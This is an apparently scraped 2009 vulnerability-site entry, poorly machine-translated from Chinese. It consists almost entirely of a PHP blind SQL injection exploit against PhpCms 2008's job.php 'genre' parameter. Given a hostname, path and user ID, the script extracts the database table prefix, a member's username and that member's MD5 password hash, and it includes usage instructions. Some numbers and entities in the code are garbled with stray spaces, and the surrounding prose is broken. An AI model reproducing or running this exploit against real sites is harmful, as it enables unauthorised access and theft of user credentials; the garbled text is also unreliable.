phpcms 0day+EXP-vulnerability warning-the black bar safety net

2009-09-21T00:00:00
ID MYHACK58:62200924729
Type myhack58
Reporter 佚名
Modified 2009-09-21T00:00:00

Description

Use's blog

So-to me.

<?

if ($argc != 4) usage ();

$hostname = $argv [1]; $path = $argv [2]; $userid = $argv [3]; $prefix="phpcms_"; //$key = "abcdefghijklmnopqrstuvwxyz0123456789"; $pos = 1; $chr = 0;

function usage () { global $argv; echo "\n[+] PhpCms 2 0 0 8 (job.php \$genre) Blind SQL Injection Exploit". "\n[+] Author: My5t3ry". "\n[+] Site : <http://hi.baidu.com/netstart>". "\n[+] Usage : php ".$ argv[0]." <hostname> <path> <userid>". "\n[+] Ex. : php ".$ argv[0]." localhost /yp 1". "\n\n"; exit (); }

function request ($hostname, $path, $query) { $fp = fsockopen ($hostname, 8 0);

$request = "GET {$path}/job. php? action=list&inputtime=0&station=4&genre={$query} HTTP/1.1\r\n". "Host: {$hostname}\r\n". "Connection: Close\r\n\r\n";

fputs ($fp, $request);while (! feof ($fp)) $reply .= fgets ($fp, 1 0 2 4);

fclose ($fp); return $reply; }

function exploit ($hostname, $path, $uid, $fld, $chr, $pos) { global $prefix;

$chr = ord ($chr);

$query = "x' OR ASCII(SUBSTRING((SELECT {$fld} FROM ".$ prefix."member WHERE userid = '{$uid}'),{$pos},1))={$chr} OR '1' = '2";

$query = str_replace(" ", "%2 0", $query);

$query = str_replace("'", "%2 5 2 7", $query);

$outcode = request ($hostname, $path, $query);

preg_match ("/<span class=\"c_orange\">(.+)& lt;\/span>/", $outcode, $x);

if (strlen (trim ($x [1])) == 0) return false; else return true; }

$query = "x%2 5 2 7";

$outcode = request ($hostname, $path, $query);

preg_match('/FROM `(.+) yp_job/ie',$outcode,$match);

$prefix=$match[1];

//function lengthcolumns () //{ echo "\n--------------------------------------------------------------------------------\n"; echo "PhpCms 2 0 0 8 (job.php \$genre) Blind SQL Injection Exploit\n"; echo "By My5t3ry (<http://hi.baidu.com/netstart>)\n"; echo "\n--------------------------------------------------------------------------------\n"; echo "[~]trying to get pre...\n";

if ($match[1]) {

echo '[+]Good Job! Wo Got The pre -> '.$ match[1]."\ n"; }

else { die(" Exploit failed..."); }

echo "[~]trying to get username length...\n"; $exit=0; $length=0; $i=0; while ($exit==0) { $query = "x' OR length((select username from ".$ prefix."member Where userid='{$userid}'))=".$ i." OR '1'='2";

$query = str_replace(" ", "%2 0", $query);

$query = str_replace("'", "%2 5 2 7", $query);

$outcode = request ($hostname, $path, $query);

$i++;

preg_match ("/<span class=\"c_orange\">(.+)& lt;\/span>/", $outcode, $x); //echo $outcode; if ($i>2 0) {die(" Exploit failed...");}

if (strlen (trim ($x[1])) != 0) { $exit=1; }else{ $exit=0; } }

$length=$i-1; echo "[+]length -> ".$ length;

// return $length; //}

echo "\n[~]Trying to Crack..."; echo "\n[+]username -> ";

while ($pos <= $length) { $key = "abcdefghijklmnopqrstuvwxyz0123456789";

if (exploit ($hostname, $path, $userid, "username", $key [$chr], $pos)) { echo $key [$chr]; $chr = -1; $pos++; } $chr++; }

$pos = 9;

echo "\n[+]password(md5) -> ";

while ($pos <= 2 4) { $key = "abcdef0123456789"; if (exploit ($hostname, $path, $userid, "password", $key [$chr], $pos)) { echo $key [$chr]; $chr = -1; $pos++; } $chr++; }

echo "\n[+]Done!"; echo "\n\n--------------------------------------------------------------------------------";

?& gt;

Do not leave a message just to get something to go I despise+ignore it! Next time don't give up.~

This hole I found there are quite a few people know. So my wouldn't mind taking to look back and say to him

Looks like he and I are to take the hole to the shelf., the.